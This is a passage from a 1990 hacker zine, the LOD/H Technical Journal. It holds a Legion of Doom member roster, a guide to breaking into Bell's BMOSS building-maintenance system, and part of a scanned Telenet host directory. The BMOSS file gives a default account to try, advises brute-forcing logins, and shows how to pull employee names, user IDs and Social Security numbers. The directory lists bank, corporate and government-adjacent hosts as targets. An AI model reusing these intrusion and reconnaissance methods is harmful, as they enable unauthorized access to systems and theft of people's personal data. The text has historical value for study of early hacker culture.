known enough, (ie: they weren't big names even though they knew more than the guys who supposedly were) I put up the Legion Of Doom! bulletin board and shortly thereafter started a phreak/hack group of the same name. This was about May of 84 from what my records show. I had been a member of KOS and LOD or a brief time and then KOS broke up. Although there were many users on the LOD bbs, VERY FEW WERE MEMBERS OF THE GROUP! This distinction seems to have been forgotten by many, since some who were on the BBS have claimed to have been in the group, which is not true. The name Legion Of Doom! obviously came from the cartoon series which pitted them against The Superfriends. I suppose other group names have come from stranger sources. My handle, Lex Luthor was taken from the movie Superman I. In the cartoon series, LOD is led by Lex Luthor and thus, the group name was rather fitting. Being young and naive, I thought having a handle of someone who claimed to have 'the greatest criminal mind on Earth' and leading a group of the world's most notorious criminals would be cool. That was about 7-8 years ago. Now however, I see that there is nothing cool or attractive about being a criminal (believe it, or not). The original group consisted of phreaks who I had thought were very good but were not considered 'famous' like those in KOS. Those original members later became some of the best known phreak personalities and contributed substantially to the knowledge of new and old phreaks alike. A list of members from the very beginning to the present follows. Through my records and from the best of my recollection I have approximated dates of entrance and exit and other information. Also, I believe I have a complete list however, there could be a mistake or two. Very few if any, handles from the past have been duplicated by 'impostors' whether knowingly or unknowingly. I look at this article as a historical document seeing how no other group has survived as long as LOD has. LOD originally consisted mainly of phreaks, but had split into two separate entities. LOD for telecommunications hobbyists, and LOH for hacking and security enthusiasts. Handle Entered Exit Location Reason for leaving ----------------------------------------------------------------------------- Lex Luthor early 84 CURRENT Here/There ---CURRENT MEMBER--- Karl Marx early 84 late 85 Colorado Went underground/quit. Mark Tabas early 84 late 85 Colorado Many reasons. Agrajag The Prolonged early 84 late 85 California Loss of interest. King Blotto early 84 late 85 Ohio No time/college. Blue Archer early 84 Fall 87 Texas College. The Dragyn early 84 late 86 Minnesota No time/lost interest. Unknown Soldier mid 84 early 85 Florida Busted- Toll fraud. Sharp Razor late 84 early 86 New Jersey Busted- Abusing CIS. Doctor Who late 84 early 86 Mass. Misc. Trouble Lord Havok late 84 CURRENT Here/There ---CURRENT MEMBER--- Sir Francis Drake late 84 early 86 California ??? Paul Muad'dib late 84 early 86 New York Went underground/quit. Phucked Agent 04 late 84 late 87 California No time. School. X-man late 84 mid 85 New York Busted- Blue boxing. Randy Smith late 84 mid 85 Texas ??? Steve Dahl early 85 early 86 Illinois Busted-Carding. The Warlock early 85 early 86 Florida Lost interest. Terminal Man early 85 late 85 Mass. Kicked out-malicious hacking Silver Spy late 86 Fall 87 Mass. College. The Videosmith early 86 Fall 87 Penn. Lost interest. Kerrang Khan early 86 Fall 87 U.K. ??? The Marauder early 86 mid 88 Conn. Lost interest. Gary Seven early 86 mid 88 Florida Lost interest. Bill From RNOC early 87 late 87 New York Misc. Trouble. Carrier Culprit mid 87 mid 88 Penn. Lost interest. Master of Impact mid 87 mid 88 California School. The Leftist mid 87 Sum 89 Georgia Misc. Trouble. Phantom Phreaker mid 87 Fall 89 Here/There Lost interest. Doom Prophet mid 87 Fall 89 Here/There Lost interest. Thomas Covenant early 88 early 89 New York Misc. Trouble. The Mentor mid 88 Sum 89 Here/There Lost interest. The Urvile mid 88 Sum 89 Georgia Misc. Trouble. Phase Jitter mid 88 CURRENT Here/There ---CURRENT MEMBER--- Prime Suspect mid 88 CURRENT Here/There ---CURRENT MEMBER--- The Prophet late 88 Sum 89 Georgia Misc. Trouble. Skinny Puppy late 88 CURRENT Here/There ---CURRENT MEMBER---- Professor Falken late 89 CURRENT Here/There ---CURRENT MEMBER--- Directory key: "Lost Interest": simply means they lost interest in phreaking/hacking in general, not lost interest in LOD/H. "???": reason for leaving is unknown. Misc. Trouble: Exactly that. Too much to go into here. Of all 38 members, only one was forcefully ejected. It was found out that Terminal Man destroyed data that was not related to covering his tracks. This has always been unacceptable to us, regardless of what the media and law enforcement tries to get you to think. Remember, people's entrance/exit times have been estimated. [ End of Article ] The LOD/H Technical Journal, Issue #4: File 07 of 10 The Trasher's Handbook to B.M.O.S.S. by Spherical Aberration INTRODUCTION: Those who have actually trashed at Bell Co. before know that finding an installation can be a pain. Most Telco buildings these days are un-marked, plain, and generally overlooked by the average person. The buildings were specifically made so that they WOULD be overlooked, concealing itself and its contents. Knowing where all Bell Co. installations are would be nice, and through the help of BMOSS we can find out where they ALL are. NOTE: It is possible to get locations from your city hall, just take a look at what property Bell Co. owns and locate it. However, there are few catches to this method. First, most cities charge you to find out who owns what property and there might be a waiting period of a few days. Second, not all Bell Co. property is owned by Bell Co. There are instances of Bell Co. renting a piece of property from a company and using the existing building, possibly with the leasing companies logo still on it. BMOSS stands for Building Maintenance Operations Service System. BMOSS provides computer support for daily building maintenance tasks. A comprehensive database helps users keep track of repair activities. Telco field mechanics logon everyday to do assorted field mechanic stuff. From BMOSS they can check on tasks needed to be done, send messages to users, charge various Telco installations for work, log time sheets, generate purchase orders, see where his buddies are eating lunch etc. BMOSSes are usually located in a BOCC (Building Operations Control Center) or in a REOC (Real Estate Operations Center). BMOSS is run under AT&T Unix System V and at some points is quite Unix-like. At each center is one PDP-11/44 or a PDP-11/84 mainframe that is the base of operations for that center and other installations supported by that BOCC/REOC. LOGGING ONTO BMOSS: Before logging on to BMOSS you must select the proper type of terminal emulation. BMOSS has 4 types of emulations available for all users. Users within the BOCC/REOC use either VT100 or VT220 compatible terminals, while other internal stations will use an LA120 printer terminal. Field Mechanics at a remote location use their typewriter like LA12 printer terminals. Identifying a BMOSS dialup is not that hard at all. After hitting a three [CR]'s the system will respond with something like this: (BEEP!) Good Morning (Depending on what time of day it is) BASE/OE - Fri 04/23/90 09:43:22 - Online 9 User ID? Password? Typically user IDs are the three initials of the field mechanics name. After inputting your ID you will be prompted with a Password? request. Passwords can be from 6 to 8 characters in length, including punctuation marks, the first letter must begin with an alphabet-letter or a number. They cannot contain spaces or the users first/middle/last name. Periodically the system will prompt the user for a new password. This period of time is usually set by the system administrator. I have found that the "WRK:A10" user ID or a variation of WRK:xxx where xxx is a alpha-numerical combination has worked excellent for me. I believe the WRK:xxx is some type of low-level account when field mechanics lose their current ID/PW combination. Initials also have been found on most of the systems, so a WRK:xxx and Initials brute-force attempt just may give you a working ID. IN BMOSS: Once penetrating initial security you are then prompted with BMOSS's FLD> main level identifier. This FLD> changes as you move from BMOSS's root to the various main BMOSS branches. Sometimes when you logon to BMOSS you will receive a memo saying, "NOTE - Check your office" at this time go to the Office and read the memos sent to you. Read THE OFFICE later in this article to learn how. BMOSS was designed with the average Joe in mind and is very logically laid out. BMOSS was modeled after UNIX's Tree-oriented structure. Here is a Tree of BMOSS's structure: BMOSS _____________|_____________ | | | | | | CON DAT ACT FOR BIL OFF Main Branches: CON- Control Functions (Sys Admin payroll/timesheet functions) DAT- Database Maintenance (What we are mainly concerned with) ACT- Field Activity (Handles field activities) FOR- Force Administration (Recording labor hrs for time sheets etc.) BIL- Bill Paying (Processing purchase orders, producing expense accts.) OFF- Electronic Office (Receive/Send Messages or Page users) Each main branch then branches off into its own specific commands. I will concentrate on the Database Maintenance functions since the other functions have little or no use to us. DATABASE MAINTENANCE: To haul in the mother lode you go into the Database Maintenance area from the root. This is accomplished by typing DAT in at the FLD> prompt. Now you should get a DAT> prompt meaning you are now in the Database Maintenance section. To get a listing of the available DAT commands type in 'SHO' which is short for SHOW. We are mainly concerned with the BLD (Building Master) function. Once the BLD function is selected you will be prompted for a sub-form. There are 7 sub-forms for the BLD function. BLD Sub-Forms: 1. GEN- General Background 2. OWN- Building Ownership (used for adding a new building to database) 3. LES- Lease Terms (used for adding a new building to database) 4. EMG- Emergency Data (contains Police and Fire Dept. that serve this location and their respective telephone numbers, and whether the location has backup power and fire-sprinklers etc.) 5. RES- Maintenance Responsibility (Maintenance entries for building) 6. WRD- Building Warden (Building Wardens number etc.) 7. NOT- General Notes (Notes about the particular building) 8. ACC- Accounting Distribution (Account for particular building) Accessing the above information is as easy as selection of the three letter identifier at the Sub-Form prompt. We are particularly concerned with the GEN (General Background) information. This function gives us the following data: 1. Building's Number 2. Building's Complete Address 3. Building's Name 4. Building's Sector (Bell informational purposes only) 5. Building's Zone (Bell informational purposes only) 6. Whether or not Bell owns the building. (A Y/N combination is usually shown here. Y meaning its is owned by Bellco, N meaning its not owned by Bellco.) 7. The building's group (One letter identifier) 8. The building's use. (Garage/Warehouse/Office etc.) 9. The kind of telephone equipment used in the building. (ESS1A etc.) 10. Whether or not Bell is Sub-leasing parts of the building. (Y/N identifier) 11. The number of floors in the building 12. The number of basements in the building (A number of 3 here would mean the building has 3 below ground level floors. 13. Whether or not the building has a cable vault. (Y/N identifier) 14. Gross Square footage of the building 15. The number of reserved parking spaces for the building. Once entering the DAT section and entering GEN as your sub-form selection you will be prompted for a building number. Random selection of building numbers is necessary because they vary from area to area. Once a legitimate building number is accessed the above information will be displayed. Ok, you now have the information you need, how do you get back to a previous directory or even log off ? That's quite easy. Typing in EXI (short for EXIT) will bring you back up to the root FLD> one directory at a time. For logging off the system you should hit EXI until you reach the FLD> root then BYE and you will get: BASE/OE - Fri 4/23/90 10:22:13 - Offline 9 Have a Good Morning OTHER FUNCTIONS: I have found the REPORTS function most helpful in finding other user IDs. To get a listing of the 20+ different types reports type 'HELP REPORT' at the FLD> prompt. We are particularly concerned with REPORT 41, the Estimated vs. Actual Hours Log. We bring this up by typing from the FLD: FLD> REPORT 41 04/02/90-04/06/90 You are inquiring for the estimated vs. actual hours time on a series of jobs from April 4th 1990 through April 6th 1990. The output then kicks out the hours and such. Every field mechanic that worked throughout those days will be displayed in- First name, Middle Initial, and Last Name totally spelled out for you. Another useful report is REPORT 90- Data Access Log. It is called up by typing: FLD> REPORT 90 Date Range? 04/06/90-04/08/90 The system then kicks out all users that used the SCOPE command on other users. The system prints out the users full name and actual USER ID and who the user scoped including the scoped-user's Social Security number. THE OFFICE: When you are prompted that you should check your messages you should do so immediately before any work is done in BMOSS. First you must go to your office which is done by selecting OFF from the FLD> identifier. Once this is done your FLD> prompt will change to a OFF> prompt. Typing HELP will give you the available HELP commands for the office. To check the messages type in: OFF> STATUS BMOSS will reply with the following: (example) Memo From User Subject Status -------------- ------------------ ---------------------- --- IPAAA 04/01/90 Wile E Coyote Current Task Info OUT BNAAA 04/02/90 Susie B Hott Last Saturday Night IN The user then sees he has a memo from his boss about his current tasks and a memo from his co-worker/seductress Susie B. Hott. Fuck his boss, he wants to read what Susie has to say. So you type in: OFF> PRINT BNAAA --- MEMO --- Date: 04/02/90 Time: 08:11 From: Susie B Hott To: Legion Of Doom Subject: Last Saturday Night LOD, I really enjoyed last saturday night. We must do it again. Give me a call soon, 555-WETT. ** Susie A useful command is a list of OFFICE users. This gives you another listing of user's Full-Name/ID combinations. Get this by typing: OFF> USERS It will then print out the users who are in the Electronic Office database. CONCLUSION: You can get HELP from anywhere just by typing HELP from the prompt. Or if you need specific information about a function type in HELP then the function name. Such as: FLD> HELP REPORT (This gives you options/help on the REPORT command) BMOSS can be used for a large amount of purposes for the hacker/trasher. Even though it doesn't have any really powerful commands to self-destruct the telephone company it can be used to access other building's trash, and other things that may interest you. ______________________ ( Spherical Aberration ) The LOD/H Technical Journal, Issue #4: File #08 of 10 The Legion Of Hackers Present: Updated: Telenet Directory Part A: Addresses 201XXX to 424XXX Revision #5 Last Updated: 2/10/90 (Includes Mnemonic Host Names) Scanned and Written by: Erik Bloodaxe INTRODUCTION: ------------- It has been some time since our last update. Our old list (Revision #4) has been distributed to those in the United States and internationally thanks to the widespread use of the PSS network. For this reason we are including the format for converting this 'local' address list into accessible hosts using the standard scheme for telenet when accessed from 'foreign' networks. For example, the local address: 20114 is 031102010001400 using the standard format. 3110 is the DNIC (Data Network Identifier Code) for USS Telenet and the zero preceding it is needed to make it clear to the foreign network that the NUA (Network User Address) is a non-local address. Another example, the local address is 203155 would be: 031102030015500 thus: 0DNIC NPA 00 XXX YY NPA is the area-code prefix (this is not necessarily an area code), XXX is the sub-address and YY is the port which is usually 00. For those unfamiliar with Telenet addressing, it generally follows the format of grouping hosts into area codes. Thus, our directory is grouped accordingly. There are 'non-standard' address prefixes which are rather obscure. These commonly are owned by the same company or organization, whereas the area code format contains hosts from many companies or organizations. The state an area code resides is also listed to give you an idea of its location. I have also included Telenet commands, mnemonic addresses, a somewhat current list of pc-pursuit dialers, and a few things to consider for the would-be Telenet scanner. NOTES: When accessing telenet from abroad, ignore the '$' after the address. This denotes to users of the USA that an NUI (Network User ID) is required due to the host not accepting collect charges for the connection. Addresses preceded by a * refuse collect connections, but I was unable to connect with them to determine what they were. Addresses that have no comments next to them either hang up upon connection, or I was unable to evoke any response from them. Due to its immense size, this directory has been presented in a 'rougher' form than our previous ones. The time to make it look 'pretty' was determined to not be worth the effort. TELENET COMMANDS ---------------- Most commands are listed in their four character form, however, some may be abbreviated to merely one character (ie. C & D). CONN Allows user to connect to a specified host DISA ECHO DISA FLOW DISA TFLO DISC Disconnect from current host DTAPE ? ENAB ECHO ENAB FLOW ENAB TFLO FULL Full duplex HANG Hang up port HALF Half duplex MAIL Telemail service PAR Set parameters as specified PAR? Shows current parameter settings RESE Resets the node to inactive RST Sets parameters of remote host as specified RST? Shows current parameters of remote host SET Same as PAR SET? Same as PAR? STAT Shows current port TAPE ? TELE Telemail service TEST CHAR Test of all ascii characters TEST ECHO Test which echos all characters typed TEST TRIA Test which makes repeating triangle TEST VERS Shows current pad software version The default command is CONN, so if an address is entered at the '@' prompt, an attempt will be made to connect to that address. A connection attempt may be aborted by sending a break signal. This will put you back to the '@' prompt. To return to the '@' prompt from an established connection the user must type '@' followed by carriage return. Normal 300/1200 users awaken the pad with two carriage returns. 2400 baud users must type '@' then carriage return. To awaken the pad in the Uninet format, type: carriage return, period, then carriage return (upon initial connection). To find the telenet dialup nearest your location, call 800-424- 9494 at 300/1200 baud. At the '@' prompt, type 'MAIL'. Enter user name 'PHONES' with password 'PHONES'. TELENET DIRECTORY ----------------- 201--NEW JERSEY--ADDRESSES SCANNED: 0-2000 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 1 PC Pursuit Dialer (1200) 14 WELCOME, NAME OR #? 15 " " $ 20 VM/370 $ 22 PC Pursuit Dialer (2400) * 23 25 WELCOME, NAME OR #? 32 D&B $ 34 PRIME MWH $ 35 PRIME 45 NEWSNET $ 49 VAX 50 UNIX Interet $ 51 PRIME USCGB 53 Colgates IICS $ 55 PRIME USCGB $ 66 PRIME SYS001 67 Warner Computer Systems 68 " " 69 " " 74 enter class 83 ENTER ID: 84 D&B 86 D&B 88 D&B 89 VM/370 $ 129a 138 HP-3000 * 140 146 HP-3000 149 VAX * 150 156 UNIX Securities Data Company 159a 163 VU/TEXT 164 VU/TEXT 166 VM/370 New Jersey Educational Net 171 >> 172 >> 173 200 D&B 201 D&B 220 VAX Investment Technologies 225 VAX " " $ 241 242 D&B 243 D&B 244 D&B 246 D&B 249 password required * 251 252 PRIME 259 VAX CCMI/McGraw Hill * 260 $ 301 PC Pursuit Dialer (1200) 334 TINTON1 * 336 $ 350 Concurrent Computer Corp 353 enter switch characters $ 355 Concurrent Computer Corp 359 Telenet Async to 3270 367 * 371 * 379 453 Telenet Async to 3270 454a Telenet Async to 3270 $ 458 ENTER REQUEST $ 459 " 461 VAX 463a Telenet Async to 3270 470 Decserver $ 472 MHP201A 476 X.29 Password: 477 Please enter logon cmd $ 478 MHP205A 479 Please enter logon cmd 520 Enter Access ID: 521 Bankers Trust Online 522 VAX NYBTRP * 548 586 Dow Jones News Retrieval 587 " " 589 " " 604 Lipton Network 700 HP-3000 702 TOPS-20 CEI 722 INSCI/90 730 " 751 " 752 " 770 " 792 " 799 830 INSCI/90 841 " 850 870 INSCI/90 890 " 895 " 899 910 INSCI/90 912 " 914 " 916 918 INSCI/90 940 " 950 Bankers Trust Online 951 " " 952 " " 953 " " 954 " " 955 " " 956 " " 957 " " 958 " " 959 " " 999 1025 1051 VU/TEXT 1052 " 1053 " 1054 " 1055 " 1056 " 1057 " 1058 " 1059 " 1060 " 1061 " 1062 " 1063 " 1064 " 1065 " 1066 " 1067 " 1068 " 1069 " 1075 " 1076 " 1077 " 1078 " 1079 " 202--WASHINGTON D.C.--ADRESSES SCANNED: 0-800 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- 10 PRIME 31 VAX News Machine $ 36 Network Sign-on Failed $ 38 " $ 47 VAX * 48 49 ENTER SYSTEM ID-- $ 115 PC Pursuit Dialer (300) $ 116 PC Pursuit Dialer (1200) $ 117 PC Pursuit Dialer (2400) * 123 132 VAX 133 BA 134 BA $ 138 VAX Gallaudet University $ 139 DEC-10 141 PRIME Telemail 142 PRIME Telemail $ 149 150 VAX IDR * 151 $ 154 Telenet Async to 3270 $ 155a Telenet Async to 3270 $ 156 VAX American Psychiatric Assn * 157 161 UNIX pac 162 enter user id- $ 165 HP-3000 $ 166 VAX 201 Host Name: 202 203 USER ID: 214 PRIME SPA 217 * 224 * 230 232a $ 235 PRIME AMSC $ 239 PRIME AMSA * 241 * 242 * 243 245 AOS * 253 * 254 255 Morgan Stanley Network * 258 * 260 * 265 * 266 * 275 * 276 * 277 $ 278 USER ID 308 PRIME 309 PRIME 312 PRIME * 330 * 331 * 332 * 333 * 334 * 335 336 VAX Congressional Quarterly 337 VAX " $ 343 PRIME OT 360 HP-3000 361 362 * 364 365 LEXIS/NEXIS 366 " 367 " * 371 * 372 * 373 * 377 $ 390 #Connect Requested $ 391 " * 403 430 > * 433 * 434 439 Institute of Nuclear Power 440 " 441 " 442 you are now connected 444 Institute of Nuclear Power $ 455 456 457 458 $ 462 $ 463 465 466 467 469 470 472 $ 473 $ 474 $ 475 $ 532 VAX $ 535 AOS * 536 * 652 * 653 * 654 693 HP-3000 MPE XL 709 710 711 712 810 Telenet Async to 3270 811a Telenet Async to 3270 1180 INVALID-SW-CHARACTERS 1181 1182 NCR Comten 203--CONNECTICUT--ADDRESSES SCANNED: 0-600 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- 22 VM/370 * 57 $ 60 HP-3000 66 Login Please: 72 HP-3000 73a Password: 75 VAX $ 105 PC Pursuit Dialer (2400) $ 120 PC Pursuit Dialer (300) $ 121 PC Pursuit Dialer (1200) $ 132 VAX * 135 136 PRIME SYSA $ 140 ID 165 Telekurs USA * 230 * 231 304 HP-3000 $ 305 Name? 307 HP-3000 310 * 311 * 331 * 332 * 501 602 DESTINATION? 205--ALABAMA--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- * 30 $ 33 ID * 34 * 36 $ 73 PRIME ALABMA * 137 $ 145 HP-3000 206--WASHINGTON--ADDRESSES SCANNED: 0-1000 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 20 HP-3000 $ 30 HP-3000 32 VAX $ 35 DMOLNCT $ 38 AOS $ 40 PRIME P6350 $ 42 AOS $ 44 AOS $ 50 AOS 53 $ 57 AOS 65 PRIME OAD $ 131 AOS $ 132 VAX ETA-RX $ 135 AOS 137a Boeing msg switch $ 138 USSMSG2 $ 139 WANG VS SECURITIES (FRS) $ 141 AOS $ 145 AOS $ 146 PRIME SEATLE $ 147 AOS * 150 $ 160 AOS $ 161 AOS 175a Boeing test $ 205 PC Pursuit Dialer (300) $ 206 PC Pursuit Dialer (1200) 207a $ 208 PC Pursuit Dialer (2400) $ 250 WANG VS SYSTEM ONE (FRC) $ 251 WANG VS SYSTEM TWO (TACOMA) $ 338 $ 357 HP-3000 $ 430 Environmental Ctrl Monitor 439 bcs network 440 NOS Boeing 447 NOS Boeing 448 bcs network 449 VM/370 207--MAINE--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- * 51 208--IDAHO--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 42 AOS $ 43 AOS $ 56 AOS $ 131 AOS $ 134 AOS $ 135 AOS $ 136 AOS $ 137 AOS $ 140 AOS $ 141 AOS * 150 $ 152 AOS 209--CALIFORNIA--ADDRESSES SCANNED: 0-200 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- $ 30 AOS $ 31 AOS * 33 * 34 211--DUN & BRADSTREET--ADDRESSES SCANNED: 0-100/1000-2000 $ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE ---------------------------------------------------- 1140 1142 1145 Dun & Bradstreet Terminal 1190 " " 1195 " " 1240 " " 1244 " " 1290 " " 1291 " " 1295 " " 1390 " " 1391 " " 1392 PRIME 1396 Dun & Bradstreet Terminal 1490 PRIME 1491 Dun & Bradstreet Terminal 1492 " " 1493 " " 1494 " " 1540 " " 1591 " " 1594 " "